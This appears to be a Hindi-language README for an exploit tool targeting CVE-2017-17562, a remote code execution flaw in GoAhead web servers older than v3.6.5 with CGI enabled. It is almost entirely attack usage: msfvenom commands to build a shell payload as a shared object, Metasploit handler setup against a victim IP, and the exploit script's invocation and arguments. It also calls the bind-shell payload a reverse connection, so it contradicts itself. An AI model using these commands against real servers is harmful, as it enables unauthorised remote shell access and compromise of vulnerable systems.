
CVE-2017-17562 भेद्यता के लिए एक्सप्लॉइट, जो GoAhead (< v3.6.5) पर RCE की अनुमति देता है यदि CGI सक्षम है और एक CGI प्रोग्राम डायनामिक रूप से लिंक किया गया है।
CVE-2017-17562 भेद्यता के लिए एक्सप्लॉइट, जो GoAhead (< v3.6.5) पर RCE की अनुमति देता है, यदि CGI सक्षम है और एक CGI प्रोग्राम डायनामिक रूप से लिंक किया गया है।
$ python3 exploit.py [-h] --host HOST --port PORT --payload PAYLOAD [--ssl] [--cgi CGI]
$ python3 -m pip install -r requirements.txt
आपको पहले पेलोड उत्पन्न करना और लिसनिंग कनेक्शन सेट करना होगा।
उदाहरण:
(हमलावर: 192.168.1.100 - पीड़ित: 192.168.1.200)
$ msfvenom -a x64 --platform Linux -p generic/shell_bind_tcp LHOST=192.168.1.100 LPORT=1337 -f elf-so -o payload.so
$ msfconsole
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload generic/shell_bind_tcp
msf6 exploit(multi/handler) > set LPORT=1337
msf6 exploit(multi/handler) > set RHOST=192.168.1.200
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.1.200:1337
फिर, दूसरे शेल में, आपको इस एक्सप्लॉइट को चलाना होगा ताकि पेलोड भेजा जा सके जो लिसनर के लिए रिवर्स कनेक्शन शुरू करेगा!
आवश्यक तर्क:
--host HOST GoAhead वेबसर्वर चलाने वाला होस्ट।
--port PORT GoAhead वेबसर्वर चलाने वाला पोर्ट। डिफ़ॉल्ट: 80
--payload PAYLOAD पेलोड का पथ।
वैकल्पिक तर्क:
--ssl होस्ट SSL का उपयोग कर रहा है।
--cgi LIST GoAhead सर्वर पर CGI स्क्रिप्ट खोजने के लिए पथों की सूची। डिफ़ॉल्ट: paths.lst
$ python3 exploit.py --host 192.168.1.200 --port 8080 --cgi custom_list.txt --payload payload.so --ssl